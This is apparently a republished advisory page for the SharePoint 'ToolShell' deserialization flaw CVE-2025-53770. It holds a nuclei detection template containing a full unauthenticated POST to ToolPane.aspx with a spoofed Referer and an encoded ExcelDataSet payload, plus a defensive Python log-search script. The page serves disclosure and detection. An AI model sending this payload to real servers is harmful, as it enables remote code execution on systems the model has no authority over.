Microsoft SharePoint Remote Code Execution Vulnerability

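Vulnerability Information

Vulnerability name: Microsoft SharePoint Remote Code Execution Vulnerability

Vulnerability ID:

  • CVE: CVE-2025-53770

Vulnerability type: Deserialization

Severity: Critical

Description: Microsoft SharePoint Server is a widely used enterprise collaboration platform that supports document management, team collaboration, business process automation and other functions, and is common in large enterprises and organizations. The disclosed vulnerability CVE-2025-53770 is a deserialization issue in SharePoint Server: an attacker can execute arbitrary code over the network by abusing deserialization of unvalidated data. The technical root cause is that SharePoint Server fails to properly validate and sanitize data when handling certain input, so an attacker can craft malicious data that triggers the deserialization process and leads to arbitrary code execution. Because no authentication is required to exploit the vulnerability and exploit code is already public, it is rated critical. An attacker who successfully exploits it can take full control of the affected SharePoint Server, leading to data leakage, service disruption or other malicious actions. Microsoft is aware of the vulnerability and is preparing a comprehensive update to fix it. In the meantime, users are advised to apply the mitigations provided in the CVE documentation to avoid being attacked.

Vendor: Microsoft

Product: SharePoint Server

Search query: http.component:"Sharepoint"

Source: https://github.com/projectdiscovery/nuclei-templates/blob/f9cb5bbd752422799605213c175b5701549025e2/http%2Fcves%2F2025%2FCVE-2025-53770.yaml

Type: projectdiscovery/nuclei-templates:github issues

PoC Details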


id: CVE-2025-53770

info:
  name: Microsoft SharePoint - Remote Code Execution "Toolshell"
  author: SamIntruder
  severity: critical
  description: |
    Deserialization of untrusted data in on-premises Microsoft SharePoint Server allows an unauthorized attacker to execute code over a network. Microsoft is aware that an exploit for CVE-2025-53770 exists in the wild. Microsoft is preparing and fully testing a comprehensive update to address this vulnerability. In the meantime, please make sure that the mitigation provided in this CVE documentation is in place so that you are protected from exploitation.
  impact: |
    Unauthenticated attackers can exploit unsafe deserialization to achieve remote code execution on SharePoint Server, leading to full system compromise.
  reference:
    - https://github.com/hazcod/CVE-2025-53770/blob/main/pkg/payload/test_payload.go
    - https://x.com/codewhitesec/status/1944743478350557232
    - https://msrc.microsoft.com/blog/2025/07/customer-guidance-for-sharepoint-vulnerability-cve-2025-53770/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-53770
  classification:
    cve-id: CVE-2025-53770
    cvss-score: 9.8
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.component:"Sharepoint"
  tags: cve,cve2025,kev,sharepoint,rce

http:
  - raw:
      - |
        POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx HTTP/1.1
        Host: {{Host}}
        Referer: /_layouts/SignOut.aspx
        Content-Type: application/x-www-form-urlencoded

        MSOTlPn_Uri={{Scheme}}://{{Host}}&MSOTlPn_DWP=%0A%3C%25%40%20Register%20Tagprefix%3D%22Scorecard%22%20Namespace%3D%22Microsoft%2EPerformancePoint%2EScorecards%22%20Assembly%3D%22Microsoft%2EPerformancePoint%2EScorecards%2EClient%2C%20Version%3D16%2E0%2E0%2E0%2C%20Culture%3Dneutral%2C%20PublicKeyToken%3D71e9bce111e9429c%22%20%25%3E%0A%3C%25%40%20Register%20Tagprefix%3D%22asp%22%20Namespace%3D%22System%2EWeb%2EUI%22%20Assembly%3D%22System%2EWeb%2EExtensions%2C%20Version%3D4%2E0%2E0%2E0%2C%20Culture%3Dneutral%2C%20PublicKeyToken%3D31bf3856ad364e35%22%20%25%3E%0A%3Casp%3AUpdateProgress%20ID%3D%22UpdateProgress1%22%20DisplayAfter%3D%2210%22%20runat%3D%22server%22%20AssociatedUpdatePanelID%3D%22upTest%22%3E%0A%20%20%3CProgressTemplate%3E%0A%20%20%20%20%3Cdiv%20class%3D%22divWaiting%22%3E%0A%20%20%20%20%20%20%3CScorecard%3AExcelDataSet%20CompressedDataTable%3D%22H4sIAADEfmgA%2F4WRX2uzMBTG7%2F0Ukvs06ihjQb3ZbgobG1TYeO9OY6yBJpGTdHbfvudVu44x6FUkPn9%2BPEnK1nTdHuV8gE1P9uCCtKGFCBU7opNB9dpC4NYo9MF3kStvJen4rGKLZ4645bkU8c%2Bc1Umalp33%2F0%2F62gGmC45pK9bA7qBZOpdI9OMrtpryM3ZR9RAee3B7HSpmXNAYdTuFTnGDVwvZKZiK9TEOUohxHFfj3crjXhRZlouPl%2BftBMspIYJTVHlxEcQt13cdFTY6xHeEYdB4vaX7jet8vXERj8S%2FVeCcxicdtYrGuzf4OnhoSzGpftoaYykQ7FAXWbHm2T0v8qYoZP4g1%2Bt%2Fpbj%2BvyKIPxhKQUssEwvaeFpdTLOX4tfz18kZONVdDRICAAA%3D%22%20DataTable%2DCaseSensitive%3D%22false%22%20runat%3D%22server%22%3E%3C%2FScorecard%3AExcelDataSet%3E%0A%20%20%20%20%3C%2Fdiv%3E%0A%20%20%3C%2FProgressTemplate%3E%0A%3C%2Fasp%3AUpdateProgress%3E%0A

    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - 'CompressedDataTable="(.*?)"'
        name: encoded_response
        internal: true

    matchers:
      - type: dsl
        name: decoded_response
        dsl:
          - 'contains(gzip_decode(base64_decode(encoded_response)), "IntruderScannerDetectionPayload")'
          - 'status_code == 200'
        condition: and
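
For defenders, the request shape in the template above (a POST to /_layouts/15/ToolPane.aspx carrying a Referer of /_layouts/SignOut.aspx) can be searched for in IIS logs. The following is an added example, not part of the original page or the nuclei-templates project; the log lines are constructed, and the field names assume the standard IIS W3C extended format.

```python
from urllib.parse import unquote

# Constructed sample in IIS W3C extended format (documentation IPs, not real traffic).
# IIS W3C logs do not record request bodies, so only the request line and headers are visible.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2025-07-22 08:01:10 192.0.2.10 GET /_layouts/15/start.aspx - 443 alice 198.51.100.7 Mozilla/5.0 - 200 0 0 31
2025-07-22 08:02:44 192.0.2.10 POST /_layouts/15/ToolPane.aspx DisplayMode=Edit&a=/ToolPane.aspx 443 - 203.0.113.50 curl/8.5.0 /_layouts/SignOut.aspx 200 0 0 212
2025-07-22 08:03:02 192.0.2.10 POST /_layouts/15/ToolPane.aspx DisplayMode=Edit 443 bob 198.51.100.9 Mozilla/5.0 https://sp.example.test/sites/hr/home.aspx 200 0 0 95
2025-07-22 08:04:19 192.0.2.10 POST /_layouts/15/toolpane.aspx DisplayMode=Edit&a=/ToolPane.aspx 443 - 203.0.113.51 python-requests/2.32 https://sp.example.test/_layouts/SignOut.aspx 401 0 0 12
"""

TARGET_STEM = "/_layouts/15/toolpane.aspx"   # path from the template's request line
SIGNOUT_REFERER = "/_layouts/signout.aspx"   # Referer value the template sends


def parse_w3c(text):
    """Yield one dict per entry, keyed by the most recent #Fields directive."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):  # skip truncated or malformed rows
                yield dict(zip(fields, values))


def find_toolpane_hits(text):
    """Return POSTs to ToolPane.aspx whose Referer is the sign-out page."""
    hits = []
    for e in parse_w3c(text):
        stem = unquote(e.get("cs-uri-stem", "")).lower()
        referer = unquote(e.get("cs(Referer)", "")).lower()
        if e.get("cs-method") == "POST" and stem == TARGET_STEM and SIGNOUT_REFERER in referer:
            hits.append({
                "when": f'{e["date"]} {e["time"]}',
                "client": e.get("c-ip"),
                "anonymous": e.get("cs-username") == "-",
                "status": e.get("sc-status"),
                # The template's matcher requires status 200; triage these first.
                "served": e.get("sc-status") == "200",
            })
    return hits


if __name__ == "__main__":
    for hit in find_toolpane_hits(SAMPLE_LOG):
        print(hit)
```

A hit shows only that a request of this shape reached the server; whether the deserialization was triggered has to be confirmed from host-side evidence.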



Microsoft SharePoint Remote Code Execution Vulnerability
http://example.com/2025/07/22/github_3911484895/
Author: lianccc
Published: July 22, 2025